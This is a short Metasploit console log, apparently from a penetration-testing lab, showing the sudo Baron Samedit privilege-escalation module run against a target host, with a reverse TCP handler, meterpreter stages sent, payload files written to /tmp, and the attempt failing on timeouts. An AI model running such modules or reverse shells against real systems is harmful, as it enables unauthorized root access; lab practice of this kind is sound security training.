msf exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 10.10.14.174:80
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (3090404 bytes) to 10.129.203.52
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Writing '/tmp/Y05xmBtsQ.py' (763 bytes) ...
[*] Writing '/tmp/libnss_n/rZZkh .so.2' (540 bytes) ...
[*] Sending stage (3090404 bytes) to 10.129.203.52
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] Meterpreter session 9 is not valid and will be closed
[*] 10.129.203.52 - Meterpreter session 9 closed.
[-] Meterpreter session 10 is not valid and will be closed
[*] 10.129.203.52 - Meterpreter session 10 closed. Reason: Died
[*] 10.129.203.52 - Meterpreter session 10 closed.
[-] run: Interrupted